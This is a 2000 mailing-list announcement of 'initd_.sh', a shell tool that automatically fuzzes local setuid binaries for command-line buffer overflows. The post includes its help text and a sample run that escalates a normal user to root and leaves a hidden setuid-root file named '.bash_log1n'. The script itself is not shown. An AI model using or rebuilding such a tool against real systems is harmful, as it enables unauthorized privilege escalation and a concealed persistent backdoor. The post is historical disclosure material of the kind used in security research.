mailing list archives
New Tool: initd_.sh;
From: "za () boo ma fu" <initd_ () digital net>
Date: Tue, 5 Sep 2000 01:17:15 -0400
/*** Attachment did not send... resending (sorry for the bulk) ***/
I wrote this tool in the last couple of days to see if I could
a program that would automatically attack local binaries and attempt to
in respect to buffer overflows via command line switches.
Despite the script's simplicity I do believe it is a powerful tool
that will aid in securing
any Linux box although I refuse to blindly advertise this as an end all
be all to local
security. As I note in the readme there are numerous discrepancies that
programs strength, however, _most_ (if not all) of these issues will be
upcoming releases of this program.
Instead of explaining the entire process and capability I'll just
paste the --help
output at the end of this message. Also I'll paste an example usage for
This program is a first of its kind as far as I know ;) I'm pretty
excited to see the
response I get from the community.
Portability to as many operating systems as possible will be
however it will take a week or two as I am generating the configurable
myself (something I have never done before at this level).
Anyway, I hope you enjoy this beta release!
initd_ () digital net
0x7F Security Research
Restless eyes and erratic blue flicker
While devilish fingers dance and slither
The sound of electricity, relentless, hums....
....When something wicked this way comes
- initd_'s verse >;)
---- Help Output ----
seychelles.initd_ % ./initd_.sh
Note: For further explanation on switches consult documentation
usage: initd_.sh [options]
-t filename Define the target binary as 'filename'
--min_buffer int Define minimum buffer size as 'int'
--max_buffer int Define maximum buffer size as 'int'
--jmp_buffer int Define buffer increment value as 'int'
--min_offset int Define minimum offset size as 'int'
--max_offset int Define maximum offset size as 'int'
--jmp_offset int Define offset increment value as 'int'
--tmp_dir dir Force all tmp files to be written to 'dir'
--rsd_dir dir Force the RSD directory to be 'dir'
--rsdct_dir dir Force the RSDCT directory to be 'dir'
--et_dir dir Force the ET directory to be 'dir'
--uid int Force user id of target binary to 'int'
--gid int Force group id of target binary to 'int'
-n Do not query program for command line switches
-s switches Pass a quoted string of switches to test
-q Switch messaging to quiet mode
-v Increase program verbocity (3 levels max)
--help | -h Display program usage
Send comments/questions/bugs to: initd_ () digital net
0x7f Security Research Team: Dangerously Deadicated. . .
--- EOHelp ---
phoenix.initd_ % id
uid=1000(initd_) gid=100(users) groups=100(users)
phoenix.initd_ % ./initd_.sh -t ../../../INITD_2000.08.24/ex
--min_buffer 1024 -v -v -v
# Automated Exploitation Tool v0.0.3
# 0x7f Security Research: Something Wicked This Way Comes...
[+] Target Confirmed
[+] Binary is not stripped
[+] Strip has been located. Exploit stealth has increased
[+] Confirmed temp directory
[+] RSD Directory confirmed
[+] Configuring for a Linux system on a i586 chip
[ ] Owner of target is root
[ ] Group name of target is root
[+] User id # determined to be 0
[+] Group id number determined to be 0
[ ] Creating the Root Shell Dropper
[+] RSD Creation Successful
[ ] Creating Root Shell Dropper Configuration Tool
[+] RSDCT Creation Successful
[ ] Creating Exploitation Tool
[+] ET Creation Succeeded
[ ] Current Switch: -s
[ ] Current Buffer Size: 1024
[ ] Current Offset: -100
[ ] Current Offset: 0
[ ] Current Offset: 100
[ ] Current Offset: 200
[ ] Current Offset: 300
[ ] Current Offset: 400
[+] Executing Cleanup
[+] Cleanup Complete
[ ] Welcome to the Dark Side
uid=0(root) gid=0(root) groups=100(users)
phoenix.initd_ % ls -la
drwxr-xr-x 2 initd_ users 1024 Sep 5 01:05 .
drwxr-xr-x 4 initd_ users 1024 Sep 5 00:31 ..
-rwsr-sr-x 1 root root 3192 Sep 5 01:05 .bash_log1n
-rw-r--r-- 1 initd_ users 9863 Sep 5 00:30 Readme
-rwxr-xr-x 1 initd_ users 21313 Sep 5 00:22 initd_.sh
- New Tool: initd_.sh; za () boo ma fu (Sep 05)